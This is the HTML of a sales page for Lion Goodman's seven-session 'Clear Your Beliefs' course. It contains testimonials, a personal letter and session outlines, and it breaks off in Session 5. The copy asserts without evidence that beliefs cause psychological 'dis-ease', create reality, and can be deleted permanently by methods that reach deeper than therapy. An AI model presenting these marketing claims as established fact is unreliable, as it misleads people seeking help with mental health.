alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack 